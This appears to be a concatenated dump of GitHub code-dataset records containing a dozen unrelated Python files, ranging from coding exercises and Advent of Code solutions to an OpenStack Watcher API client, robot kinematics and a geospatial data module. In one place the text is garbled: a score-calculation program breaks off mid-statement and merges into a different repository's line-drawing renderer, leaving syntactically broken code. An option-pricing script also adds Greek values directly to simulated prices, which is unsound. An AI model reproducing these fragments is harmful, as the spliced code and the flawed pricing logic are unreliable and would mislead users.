{:.03f}'.format(it, loss))\n print_cnt = 0\n\n torch.save(flow.state_dict(), 'flow_model.pytorch')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--dataset', default='lendingclub', help='dataset to use')\n parser.add_argument('--batch_size', default=64, type=int, help='batch size')\n parser.add_argument('--total_it', default=10000, type=int, help='number of training samples')\n parser.add_argument('--lr', default=1e-4, type=float, help='learning rate')\n\n args = parser.parse_args(sys.argv[1:])\n\n if args.dataset == 'lendingclub':\n x, y, scaler = load_data('lendingclub', is_tree=False, scaler_type='standardize')\n x = np.concatenate([x, np.zeros(x.shape[0])[:,None]], axis=1)\n \n else:\n x, y = datasets.make_moons(n_samples=30000, noise=0.05)\n x = x.astype(np.float32)\n\n train(args, x, y)\n","repo_name":"ekrim/glow","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29675537503","text":"def inputing():\n score=[]\n print('please enter the number of subjects')\n len=int(input('subjects:'))\n print('please enter students score')\n for i in range(len):\n score.append(int(input('subject'+str(i+1)+\"=\")))\n return score\ndef total():\n score=inputing()\n total=0;\n for i in range(len(score)):\n total+=score[i]\n total-=smallest(score)\n return total,len(score)-1\ndef smallest(score):\n small=score[0]\n for i in range(len(score)):\n if score[i]= dy:\n y = y0\n for x in range(x0, x1 + 1):\n # print(x)\n # print(y)\n self.glVertexC(x, y)\n\n if px < 0:\n px += 2 * dy\n else:\n y += 1 if y0 < y1 else -1\n px += 2 * (dy - dx)\n\n else:\n x = x0\n step = 1 if y0 < y1 else -1\n for y in range(y0, y1, step):\n # print(x)\n # print(y)\n self.glVertexC(x, y)\n\n if py < 0:\n py += 2 * dx\n else:\n x += 1 if x0 < x1 else -1\n py += 2 * (dx - dy)\n\n\n def display(self, name = 'out'):\n self.glFinish(name)\n\n try:\n from wand.image import Image\n from wand.display import display\n\n with Image(filename = name + '.bmp') as image:\n display(image)\n except Exception as e:\n print(e)\n pass # do nothing if no wand is installed\n","repo_name":"ciborg245/bmp_render","sub_path":"SR2/render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":3306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26055413514","text":"# deque # 10866\nimport sys\nfrom collections import deque\ninput = sys.stdin.readline\n\nnum = int(input())\ndeq = deque([])\ncount = 0\nfor i in range(num):\n order=input().split()\n if order[0] == \"push_back\":\n deq.append(int(order[1]))\n count+=1\n elif order[0] == \"push_front\":\n deq.appendleft(int(order[1]))\n count+=1\n elif order[0] == \"front\":\n if count==0:\n print(-1)\n else:\n print(deq[0])\n elif order[0] == \"back\":\n if count==0:\n print(-1)\n else:\n print(deq[-1])\n elif order[0] == \"size\":\n print(count)\n elif order[0] == \"empty\":\n if count==0:\n print(1)\n else:\n print(0)\n elif order[0] == \"pop_front\":\n if count == 0:\n print(-1)\n else:\n print(deq.popleft())\n count -= 1\n elif order[0] == \"pop_back\":\n if count == 0:\n print(-1)\n else:\n print(deq.pop())\n count -= 1","repo_name":"snowedev/baekjoon-code.plus","sub_path":"baekjoon/[deque]/[deque]Deque.py","file_name":"[deque]Deque.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70399030829","text":"# Partition List - https://leetcode.com/problems/partition-list/\n\n# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def partition(self, head, x):\n \"\"\"\n :type head: ListNode\n :type x: int\n :rtype: ListNode\n \"\"\"\n dummy = ListNode(0)\n left = dummy\n dummy_right = ListNode(0)\n right = dummy_right\n while head is not None:\n node = ListNode(head.val)\n if node.val < x:\n left.next = node\n left = node\n else:\n right.next = node\n right = node\n head = head.next\n left.next = dummy_right.next\n return dummy.next","repo_name":"igorsubbotin/leetcode_python","sub_path":"problem_086.py","file_name":"problem_086.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"44315735496","text":"#!/usr/bin/env python3\n#\n# User Date(dd/mm/yyyy) Description \n# -----------------------------------------------------------------------------------------------------------------\n# Suryakant Baluni 21/10/2023 Randomly generate a number between 1-10.\n# Ask user to guess the number.\n# Give user 3 attempts to guess the number.\n# If user guesses correct number then print \"You win!!!\" and exit program.\n# If all 3 attempts failed then print \"You lose.\"\n\nimport random\nrand_num = random.randint(1, 10)\nprint(rand_num)\nfor i in range(1,4):\n choice = int(input(\"Guess the number(1-10):\"))\n if choice == rand_num:\n print(\"You win!!!\")\n break\n else:\n print(\"Wrong answer. Please try again.\")\nelse:\n print(f\"You lose. Correct answer is {rand_num}\")\n\n","repo_name":"sbaluni/python","sub_path":"Unit_04(Randomisation)/prg_03_guess_the_number.py","file_name":"prg_03_guess_the_number.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"38724081091","text":"import os\n\nfrom Exchanges.binance.binance import BinanceFutures, BinanceSpot\nfrom Exchanges.bitmex import BitmexClient\nfrom Exchanges.bybit import BybitClient\nfrom Exchanges.ftx.ftx import FtxClient\nfrom Exchanges.kucoin import KuCoinClient\nfrom Exchanges.okx.okx import OkxClient\n\nPREFIX = \"c \"\nDATA_PATH = \"data/\"\nARCHIVE_PATH = \"archive/\"\nFETCHING_INTERVAL_HOURS = 1\nREKT_THRESHOLD = 0.5\nREGISTRATION_MINIMUM = 1\nREKT_MESSAGES = [\n \"{name} hat sich mit der Leverage vergriffen :cry:\",\n \"{name} gone **REKT**!\",\n \"{name} hat den SL vergessen...\"\n]\n# Channels where the Rekt Messages are sent\nREKT_GUILDS = [\n # Bot-Test\n {\n \"guild_id\": 916370614598651934,\n \"guild_channel\": 917146534372601886\n },\n # Next Level\n {\n \"guild_id\": 443583326507499520,\n \"guild_channel\": 704403630375305317\n }\n]\nCURRENCY_PRECISION = {\n '$': 2,\n 'USD': 2,\n '%': 2,\n 'BTC': 6,\n 'XBT': 6,\n 'ETH': 4\n}\nCURRENCY_ALIASES = {\n 'BTC': 'XBT',\n 'XBT': 'BTC',\n 'USD': '$'\n}\nEXCHANGES = {\n 'binance-futures': BinanceFutures,\n 'binance-spot': BinanceSpot,\n 'bitmex': BitmexClient,\n 'ftx': FtxClient,\n 'kucoin': KuCoinClient,\n 'bybit': BybitClient,\n 'okx': OkxClient\n}\n\nLOG_OUTPUT_DIR = \"LOGS/\"\nTESTING = os.environ.get('TESTING') == 'True'\n\n","repo_name":"jackstar12/balance-bot","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"7906940757","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport logging\n\nfrom django.conf import settings\nfrom django.utils.translation import ugettext_lazy as _\nfrom openstack_dashboard.api import base\nfrom watcherclient import client as wc\n\nfrom watcher_dashboard.utils import errors as errors_utils\n\nLOG = logging.getLogger(__name__)\nWATCHER_SERVICE = 'infra-optim'\n\n\ndef watcherclient(request, password=None):\n api_version = \"1\"\n insecure = getattr(settings, 'OPENSTACK_SSL_NO_VERIFY', False)\n ca_file = getattr(settings, 'OPENSTACK_SSL_CACERT', None)\n insert_watcher_policy_file()\n\n endpoint = base.url_for(request, WATCHER_SERVICE)\n\n LOG.debug('watcherclient connection created using token \"%s\" and url \"%s\"'\n % (request.user.token.id, endpoint))\n\n client = wc.get_client(\n api_version,\n watcher_url=endpoint,\n insecure=insecure,\n ca_file=ca_file,\n username=request.user.username,\n password=password,\n os_auth_token=request.user.token.id\n )\n return client\n\n\ndef insert_watcher_policy_file():\n policy_files = getattr(settings, 'POLICY_FILES', {})\n policy_files['infra-optim'] = 'watcher_policy.json'\n setattr(settings, 'POLICY_FILES', policy_files)\n\n\nclass Audit(base.APIDictWrapper):\n _attrs = ('uuid', 'name', 'created_at', 'modified_at', 'deleted_at',\n 'state', 'audit_type', 'audit_template_uuid',\n 'audit_template_name', 'interval')\n\n def __init__(self, apiresource, request=None):\n super(Audit, self).__init__(apiresource)\n self._request = request\n\n @classmethod\n def create(cls, request, audit_template_uuid, audit_type, name=None,\n auto_trigger=False, interval=None):\n\n \"\"\"Create an audit in Watcher\n\n :param request: request object\n :type request: django.http.HttpRequest\n\n :param audit_template_uuid: related audit template UUID\n :type audit_template_uuid: string\n\n :param audit_type: audit type\n :type audit_type: string\n\n :param interval: Audit interval (default: None)\n :type interval: int\n\n :param name: Name for this audit\n :type name: string\n\n :return: the created Audit object\n :rtype: :py:class:`~.Audit`\n \"\"\"\n\n if interval:\n return watcherclient(request).audit.create(\n audit_template_uuid=audit_template_uuid, audit_type=audit_type,\n auto_trigger=auto_trigger, interval=interval, name=name)\n else:\n return watcherclient(request).audit.create(\n audit_template_uuid=audit_template_uuid, audit_type=audit_type,\n auto_trigger=auto_trigger, name=name)\n\n @classmethod\n def list(cls, request, **filters):\n \"\"\"Return a list of audits in Watcher\n\n :param request: request object\n :type request: django.http.HttpRequest\n\n :param filters: key/value kwargs used as filters\n :type filters: dict\n\n :return: list of audits, or an empty list if there are none\n :rtype: list of :py:class:`~.Audit`\n \"\"\"\n return watcherclient(request).audit.list(detail=True, **filters)\n\n @classmethod\n @errors_utils.handle_errors(_(\"Unable to retrieve audit\"))\n def get(cls, request, audit_id):\n \"\"\"Return the audit that matches the ID\n\n :param request: request object\n :type request: django.http.HttpRequest\n\n :param audit_id: id of audit to be retrieved\n :type audit_id: int\n\n :return: matching audit, or None if no audit matches\n the ID\n :rtype: :py:class:`~.Audit`\n \"\"\"\n return watcherclient(request).audit.get(audit=audit_id)\n\n @classmethod\n def delete(cls, request, audit_id):\n \"\"\"Delete an audit\n\n :param request: request object\n :type request: django.http.HttpRequest\n\n :param audit_id: audit id\n :type audit_id: int\n \"\"\"\n return watcherclient(request).audit.delete(audit=audit_id)\n\n @property\n def id(self):\n return self.uuid\n\n\nclass AuditTemplate(base.APIDictWrapper):\n _attrs = ('uuid', 'description', 'scope', 'name', 'goal_uuid', 'goal_name',\n 'strategy_uuid', 'strategy_name', 'created_at', 'updated_at',\n 'deleted_at')\n\n def __init__(self, apiresource, request=None):\n super(AuditTemplate, self).__init__(apiresource)\n self._request = request\n\n @classmethod\n def create(cls, request, name, goal, strategy,\n description, scope):\n \"\"\"Create an audit template in Watcher\n\n :param request: request object\n :type request: django.http.HttpRequest\n\n :param name: Name for this audit template\n :type name: string\n\n :param goal: Goal UUID or name associated to this audit template\n :type goal: string\n\n :param strategy: Strategy UUID or name associated to this audit\n template\n :type strategy: string\n\n :param description: Descrition of the audit template\n :type description: string\n\n :param scope: Audit scope\n :type scope: list of list of dict\n\n :param audit_template: audit template\n :type audit_template: string\n\n :return: the created Audit Template object\n :rtype: :py:class:`~.AuditTemplate`\n \"\"\"\n audit_template = watcherclient(request).audit_template.create(\n name=name,\n goal=goal,\n strategy=strategy,\n description=description,\n scope=scope,\n )\n\n return audit_template\n\n @classmethod\n def patch(cls, request, audit_template_id, parameters):\n \"\"\"Update an audit in Watcher\n\n :param request: request object\n :type request: django.http.HttpRequest\n\n :param audit_template_id: id of the audit template we want to update\n :type audit_template_id: string\n\n :param parameters: new values for the audit template's parameters\n :type parameters: dict\n\n :return: the updated Audit Template object\n :rtype: :py:class:`~.AuditTemplate`\n \"\"\"\n parameter_list = [{\n 'name': str(name),\n 'value': str(value),\n } for (name, value) in parameters.items()]\n audit_template = watcherclient(request).audit_template.patch(\n audit_template_id, parameter_list)\n return audit_template\n\n @classmethod\n def list(cls, request, **filters):\n \"\"\"Return a list of audit templates in Watcher\n\n :param request: request object\n :type request: django.http.HttpRequest\n\n :param filters: key/value kwargs used as filters\n :type filters: dict\n\n :return: list of audit templates, or an empty list if there are none\n :rtype: list of :py:class:`~.AuditTemplate`\n \"\"\"\n return watcherclient(request).audit_template.list(\n detail=True, **filters)\n\n @classmethod\n @errors_utils.handle_errors(_(\"Unable to retrieve audit template\"))\n def get(cls, request, audit_template_id):\n \"\"\"Return the audit template that matches the ID\n\n :param request: request object\n :type request: django.http.HttpRequest\n\n :param audit_template_id: id of audit template to be retrieved\n :type audit_template_id: int\n\n :return: matching audit template, or None if no audit template matches\n the ID\n :rtype: :py:class:`~.AuditTemplate`\n \"\"\"\n return watcherclient(request).audit_template.get(\n audit_template_id=audit_template_id)\n\n @classmethod\n def delete(cls, request, audit_template_id):\n \"\"\"Delete an audit_template\n\n :param request: request object\n :type request: django.http.HttpRequest\n\n :param audit_template_id: audit id\n :type audit_template_id: int\n \"\"\"\n watcherclient(request).audit_template.delete(\n audit_template_id=audit_template_id)\n\n @property\n def id(self):\n return self.uuid\n\n\nclass ActionPlan(base.APIDictWrapper):\n _attrs = ('uuid', 'created_at', 'updated_at', 'deleted_at',\n 'audit_uuid', 'state')\n\n def __init__(self, apiresource, request=None):\n super(ActionPlan, self).__init__(apiresource)\n self._request = request\n\n @classmethod\n def list(cls, request, **filters):\n \"\"\"Return a list of action plans in Watcher\n\n :param request: request object\n :type request: django.http.HttpRequest\n\n :param filters: key/value kwargs used as filters\n :type filters: dict\n\n :return: list of action plans, or an empty list if there are none\n :rtype: list of :py:class:`~.ActionPlan`\n \"\"\"\n return watcherclient(request).action_plan.list(detail=True, **filters)\n\n @classmethod\n @errors_utils.handle_errors(_(\"Unable to retrieve action plan\"))\n def get(cls, request, action_plan_id):\n \"\"\"Return the action plan that matches the ID\n\n :param request: request object\n :type request: django.http.HttpRequest\n\n :param action_plan_id: id of action plan to be retrieved\n :type action_plan_id: int\n\n :return: matching action plan, or None if no action plan matches\n the ID\n :rtype: :py:class:`~.ActionPlan`\n \"\"\"\n return watcherclient(request).action_plan.get(\n action_plan_id=action_plan_id)\n\n @classmethod\n def delete(cls, request, action_plan_id):\n \"\"\"Delete an action plan\n\n :param request: request object\n :type request: django.http.HttpRequest\n\n :param action_plan_id: audit id\n :type action_plan_id: int\n \"\"\"\n watcherclient(request).action_plan.delete(\n action_plan_id=action_plan_id)\n\n @classmethod\n def start(cls, request, action_plan_id):\n \"\"\"Start an Action Plan\n\n :param request: request object\n :type request: django.http.HttpRequest\n\n :param action_plan_id: audit id\n :type action_plan_id: int\n \"\"\"\n watcherclient(request).action_plan.start(action_plan_id)\n\n @property\n def id(self):\n return self.uuid\n\n\nclass Action(base.APIDictWrapper):\n _attrs = ('uuid', 'created_at', 'updated_at', 'deleted_at', 'next_uuid',\n 'description', 'state', 'action_plan_uuid',\n 'action_type', 'applies_to', 'src', 'dst', 'parameter')\n\n def __init__(self, apiresource, request=None):\n super(Action, self).__init__(apiresource)\n self._request = request\n\n @classmethod\n def list(cls, request, **filters):\n \"\"\"Return a list of actions in Watcher\n\n :param request: request object\n :type request: django.http.HttpRequest\n\n :param filters: key/value kwargs used as filters\n :type filters: dict\n\n :return: list of actions, or an empty list if there are none\n :rtype: list of :py:class:`~.Action`\n \"\"\"\n return watcherclient(request).action.list(detail=True, **filters)\n\n @classmethod\n @errors_utils.handle_errors(_(\"Unable to retrieve action\"))\n def get(cls, request, action_id):\n \"\"\"Return the action that matches the ID\n\n :param request: request object\n :type request: django.http.HttpRequest\n\n :param action_id: id of action to be retrieved\n :type action_id: int\n\n :return: matching action, or None if no action matches\n the ID\n :rtype: :py:class:`~.Action`\n \"\"\"\n return watcherclient(request).action.get(action_id=action_id)\n\n @classmethod\n def delete(cls, request, action_id):\n \"\"\"Delete an action\n\n :param request: request object\n :type request: django.http.HttpRequest\n\n :param action_id: action_plan id\n :type action_id: int\n \"\"\"\n watcherclient(request).action.delete(\n action_id=action_id)\n\n @classmethod\n def start(cls, request, action_id):\n \"\"\"Start an Action Plan\n\n :param request: request object\n :type request: django.http.HttpRequest\n\n :param action_id: action_plan id\n :type action_id: int\n \"\"\"\n patch = []\n patch.append({'op': 'replace', 'path': '/state', 'value': 'PENDING'})\n watcherclient(request).action.update(action_id, patch)\n\n @property\n def id(self):\n return self.uuid\n\n\nclass Goal(base.APIDictWrapper):\n \"\"\"Goal resource.\"\"\"\n\n _attrs = ('uuid', 'name', 'display_name', 'created_at',\n 'updated_at', 'deleted_at', 'efficacy_specifications')\n\n def __init__(self, apiresource, request=None):\n super(Goal, self).__init__(apiresource)\n self._request = request\n\n @classmethod\n def list(cls, request, **filters):\n \"\"\"Return a list of goals in Watcher\n\n :param request: request object\n :type request: django.http.HttpRequest\n\n :param filters: key/value kwargs used as filters\n :type filters: dict\n\n :return: list of goals, or an empty list if there are none\n :rtype: list of :py:class:`~.Goal` instance\n \"\"\"\n return watcherclient(request).goal.list(detail=True, **filters)\n\n @classmethod\n @errors_utils.handle_errors(_(\"Unable to retrieve goal\"))\n def get(cls, request, goal):\n \"\"\"Return the goal that matches the ID\n\n :param request: request object\n :type request: django.http.HttpRequest\n\n :param goal: uuid of goal to be retrieved\n :type goal: int\n\n :return: matching goal, or None if no goal matches the UUID\n :rtype: :py:class:`~.Goal` instance\n \"\"\"\n return watcherclient(request).goal.get(goal)\n\n @property\n def id(self):\n return self.uuid\n\n\nclass Strategy(base.APIDictWrapper):\n \"\"\"Strategy resource.\"\"\"\n\n _attrs = ('uuid', 'name', 'display_name', 'goal_uuid', 'goal_name',\n 'created_at', 'updated_at', 'deleted_at')\n\n def __init__(self, apiresource, request=None):\n super(Strategy, self).__init__(apiresource)\n self._request = request\n\n @classmethod\n def list(cls, request, **filters):\n \"\"\"Return a list of strategies in Watcher\n\n :param request: request object\n :type request: django.http.HttpRequest\n\n :param filters: key/value kwargs used as filters\n :type filters: dict\n\n :return: list of strategies, or an empty list if there are none\n :rtype: list of :py:class:`~.Strategy` instances\n \"\"\"\n return watcherclient(request).strategy.list(detail=True, **filters)\n\n @classmethod\n @errors_utils.handle_errors(_(\"Unable to retrieve strategy\"))\n def get(cls, request, strategy):\n \"\"\"Return the strategy that matches the UUID\n\n :param request: request object\n :type request: django.http.HttpRequest\n\n :param strategy: uuid of strategy to be retrieved\n :type strategy: str\n\n :return: matching strategy, or None if no strategy matches the UUID\n :rtype: :py:class:`~.Strategy` instance\n \"\"\"\n return watcherclient(request).strategy.get(strategy)\n\n @property\n def id(self):\n return self.uuid\n\n\nclass EfficacyIndicatorSpec(base.APIDictWrapper):\n\n attrs = ('name', 'description', 'unit', 'schema')\n\n\nclass EfficacyIndicator(base.APIDictWrapper):\n\n def __init__(self, indicator):\n super(EfficacyIndicator, self).__init__(indicator)\n self.value = getattr(indicator, 'value', None)\n self.name = getattr(indicator, 'name', None)\n self.description = getattr(indicator, 'description', None)\n self.unit = getattr(indicator, 'unit', None)\n","repo_name":"openstack/watcher-dashboard","sub_path":"watcher_dashboard/api/watcher.py","file_name":"watcher.py","file_ext":"py","file_size_in_byte":16321,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"21"} +{"seq_id":"42913546276","text":"import math\nimport numpy as np\n\n\n\ndef dh_transformation(Ai, # link length \n ai, # link twist\n Di, # link offset\n Ti # joint angle\n ):\n \n # pass the DH params into desired transformation\n transformation = np.array([[math.cos(Ti), -math.sin(Ti) * math.cos(ai), math.sin(Ti) * math.sin(ai), Ai * math.cos(Ti)],\n [math.sin(Ti), math.cos(Ti) * math.cos(ai), -math.cos(Ti) * math.sin(ai), Ai * math.sin(Ti)],\n [0, math.sin(ai), math.cos(ai), Di ],\n [0, 0, 0, 1 ]])\n \n # return the transformation\n return transformation\n\n\ndef kinematic_chain(DH1, DH2):\n # initialize total transformation\n TT = np.identity(4) \n \n # loop through the transformation matrices to multiply them\n for i in range(4):\n for j in range(4):\n TT[i][j] = (DH1[i][0]*DH2[0][j]) + (DH1[i][1]*DH2[1][j]) + (DH1[i][2]*DH2[2][j]) + (DH1[i][3]*DH2[3][j])\n \n # return the resulting transformation\n return TT\n \n\n\ndef get_pos(trans):\n # get x coord\n x = trans[0][3] \n # get y coord \n y = trans[1][3] \n # get z coord \n z = trans[2][3] \n \n # return the xyz coordinates\n return [x,y,z] \n\n\ndef get_rot(trans):\n # get roll\n roll = math.atan(trans[2][1]/trans[2][2])\n # get pitch \n pitch = math.atan(-trans[2][0]/(math.sqrt(trans[2][1]**2+trans[2][2]**2))) \n # get yaw \n yaw = math.atan(trans[1][0]/trans[0][0]) \n \n # return the roll, pitch and yaw\n return [roll, pitch, yaw] ","repo_name":"mattb19/lab3","sub_path":"robot_model.py","file_name":"robot_model.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70330786294","text":"with open(\"input.txt\", \"r\") as f:\n planetlist = {planet[4:7]: planet[:3] for planet in f.readlines()}\n orbitcount = 0\n\nfor planet in planetlist:\n while planet != \"COM\":\n orbitcount += 1\n planet = planetlist[planet]\n\nprint(orbitcount)","repo_name":"AyaPK/advent-of-code","sub_path":"2019/day6/day6.py","file_name":"day6.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"810112641","text":"import sys\nimport re\n\noffset_re = re.compile(r\"#(\\d+) @ (\\d+),(\\d+): (\\d+)x(\\d+)\")\n\n\ndef get_offset_dimensions(line):\n groups = offset_re.findall(line)\n return groups[0]\n\n\ndef overlapping(fabric, x_offset, y_offset, width, height):\n for row in range(height):\n for col in range(width):\n if fabric[row + y_offset][col + x_offset] == \"X\":\n return True\n return False\n\n\ndef main(filename):\n fabric = []\n for i in range(1000):\n fabric.append([])\n for j in range(1000):\n fabric[i].append(\".\")\n claims = []\n with open(filename, \"r\") as fp:\n for line in fp:\n claim_id, x_offset, y_offset, width, height = list(\n map(int, get_offset_dimensions(line))\n )\n claims.append((claim_id, x_offset, y_offset, width, height))\n for row in range(height):\n for col in range(width):\n y = row + y_offset\n x = col + x_offset\n cell = fabric[y][x]\n if cell == \".\":\n fabric[y][x] = \"#\"\n else:\n fabric[y][x] = \"X\"\n for claim_id, x_offset, y_offset, width, height in claims:\n if not overlapping(fabric, x_offset, y_offset, width, height):\n print(claim_id)\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1])\n","repo_name":"volker48/aoc2018","sub_path":"day3_part2.py","file_name":"day3_part2.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"8248223657","text":"import numpy as np\n\n# Input Option Greek values\ndelta = 0.5\ngamma = 0.1\ntheta = -0.02\nvega = 0.03\nrho = 0.01\n\n# Other input parameters\nspot_price = 100\nstrike_price = 110\nvolatility = 0.2\ninterest_rate = 0.05\ntime_to_expiration = 1\n\n# Number of simulations\nnum_simulations = 10000\n\n# Generate random numbers for the simulations\nnp.random.seed(0)\nrand1 = np.random.normal(0, 1, num_simulations)\nrand2 = np.random.normal(0, 1, num_simulations)\n\n# Simulate the price of the underlying asset at expiration\nprice_at_expiration = spot_price * np.exp((interest_rate - (volatility ** 2) / 2) * time_to_expiration + volatility * np.sqrt(time_to_expiration) * rand1)\n\n# Calculate the payoff at expiration\npayoff_at_expiration = np.maximum(price_at_expiration - strike_price, 0)\n\n# Simulate the option price at time 0\nprice_at_time_0 = payoff_at_expiration * np.exp(-interest_rate * time_to_expiration)\n\n# Add the Greek value perturbations\nprice_at_time_0 += delta * (price_at_expiration - spot_price) + gamma * (price_at_expiration - spot_price) ** 2 + theta * time_to_expiration + vega * rand2 + rho * interest_rate\n\n# Calculate the average option price\noption_price = np.mean(price_at_time_0)\n\nprint(\"Option price: \", option_price)\n\n\n\n","repo_name":"PsychedelicBull/MonteCarloSim1greekarguments","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27166611593","text":"from typing import Any, Callable, Dict, Optional, cast\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport segmentation_models_pytorch as smp\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom pytorch_lightning.core.datamodule import LightningDataModule\nfrom pytorch_lightning.core.lightning import LightningModule\nfrom torch import Tensor\nfrom torch.nn.modules import Module\nfrom torch.optim.lr_scheduler import ReduceLROnPlateau\nfrom torch.utils.data import DataLoader\nfrom torchvision.transforms import Compose\n\nfrom torchgeo.datasets import EnviroAtlas\nfrom torchgeo.datasets.utils import stack_samples\nfrom torchgeo.samplers.single import GridGeoSampler\nfrom torchgeo.samplers.batch import RandomBatchGeoSampler\n\nclass EnviroatlasLearnPriorDataModule(LightningDataModule):\n \"\"\"LightningDataModule implementation for the Enviroatlas dataset.\n\n Uses the random splits defined per state to partition tiles into train, val,\n and test sets.\n \"\"\"\n\n def __init__(\n self,\n root_dir: str,\n states_str: str,\n classes_keep: list,\n patches_per_tile: int = 200,\n patch_size: int = 128,\n batch_size: int = 64,\n num_workers: int = 4,\n onehot_encode_labels: bool = False,\n nlcd_blur_kernelsize: int = 101,\n nlcd_blur_sigma: int = 31,\n train_set: str = \"train\",\n val_set: str = \"val\",\n test_set: str = \"test\",\n **kwargs: Any,\n ) -> None:\n \"\"\"Initialize a LightningDataModule for Enviroatlas based DataLoaders.\n\n Args:\n root_dir: The ``root`` arugment to pass to the Enviroatlas Dataset\n classes\n states_str: The states to use to train the model, concatenated with '+'\n patches_per_tile: The number of patches per tile to sample\n batch_size: The batch size to use in all created DataLoaders\n num_workers: The number of workers to use in all created DataLoaders\n patch_size: size of each instance in the batch, in pixels\n classes_keep: list of valid classes for the prediction problem\n onehot_encode_labels: whether to one-hot encode the labels for training,\n will depend on your loss function\n nlcd_blur_kernelsize: kernel computation extent; parameter in pixels\n nlcd_blur_sigma: standard deviation of Gaussian blur, in pixelsß\n train_set: Set to train on\n val_set: Set to validate on\n test_set: Set to test on\n \"\"\"\n super().__init__() # type: ignore[no-untyped-call]\n\n states = states_str.split(\"+\")\n for state in states:\n assert state in [\n \"pittsburgh_pa-2010_1m\",\n \"durham_nc-2012_1m\",\n \"austin_tx-2012_1m\",\n \"phoenix_az-2010_1m\",\n ]\n \n if nlcd_blur_kernelsize != 101 or nlcd_blur_sigma != 31:\n print(f'current dataset does not support kernelsize {nlcd_blur_kernelsize} with' +\n f'blur sigma {nlcd_blur_sigma}')\n\n self.root_dir = root_dir\n self.layers = [\n \"prior_no_osm_no_buildings\",\n \"buildings\",\n \"roads\",\n \"waterbodies\",\n \"waterways\",\n \"lc\",\n ]\n\n self.num_nlcd_layers = 5\n self.patches_per_tile = patches_per_tile\n self.patch_size = patch_size\n self.original_patch_size = patch_size * 3\n self.batch_size = batch_size\n self.num_workers = num_workers\n self.onehot_encode_labels = onehot_encode_labels\n \n print('patch size = ',patch_size)\n print('batch size = ',batch_size)\n print('patches_per_tile = ',patches_per_tile)\n\n self.classes_keep = classes_keep\n self.ignore_index = len(classes_keep)\n\n # if the prior is to be used, use it as input layer, not output supervision\n # unless you modifify the code prior will not be used at all\n self.prior_as_input = True\n\n self.train_sets = [f\"{state}-{train_set}\" for state in states]\n self.val_sets = [f\"{state}-{val_set}\" for state in states]\n self.test_sets = [f\"{state}-{test_set}\" for state in states]\n print(f\"train sets are: {self.train_sets}\")\n print(f\"val sets are: {self.val_sets}\")\n print(f\"test sets are: {self.test_sets}\")\n\n def pad_to(\n self, size: int = 512, image_value: int = 0, mask_value: int = 0\n ) -> Callable[[Dict[str, Tensor]], Dict[str, Tensor]]:\n \"\"\"Returns a function to perform a padding transform on a single sample.\n Args:\n size: output image size\n image_value: value to pad image with\n mask_value: value to pad mask with\n Returns:\n function to perform padding\n \"\"\"\n\n def pad_inner(sample: Dict[str, Tensor]) -> Dict[str, Tensor]:\n _, height, width = sample[\"image\"].shape\n assert height <= size and width <= size\n\n height_pad = size - height\n width_pad = size - width\n\n # See https://pytorch.org/docs/stable/generated/torch.nn.functional.pad.html\n # for a description of the format of the padding tuple\n sample[\"image\"] = F.pad(\n sample[\"image\"],\n (0, width_pad, 0, height_pad),\n mode=\"constant\",\n value=image_value,\n )\n sample[\"mask\"] = F.pad(\n sample[\"mask\"],\n (0, width_pad, 0, height_pad),\n mode=\"constant\",\n value=mask_value,\n )\n return sample\n\n return pad_inner\n\n def center_crop(\n self, size: int = 512\n ) -> Callable[[Dict[str, Tensor]], Dict[str, Tensor]]:\n \"\"\"Returns a function to perform a center crop transform on a single sample.\n Args:\n size: output image size\n Returns:\n function to perform center crop\n \"\"\"\n\n def center_crop_inner(sample: Dict[str, Tensor]) -> Dict[str, Tensor]:\n _, height, width = sample[\"image\"].shape\n\n y1 = (height - size) // 2\n x1 = (width - size) // 2\n sample[\"image\"] = sample[\"image\"][:, y1 : y1 + size, x1 : x1 + size]\n sample[\"mask\"] = sample[\"mask\"][:, y1 : y1 + size, x1 : x1 + size]\n\n return sample\n\n return center_crop_inner\n\n def preprocess(self, sample: Dict[str, Any]) -> Dict[str, Any]:\n \"\"\"Preprocesses a single sample.\"\"\"\n # sample['image'] contains the weak inputs, sample['mask'] is the hr labelsß\n\n # normalize just the NLCD layers because they get stored as 0...255\n sample[\"image\"] = 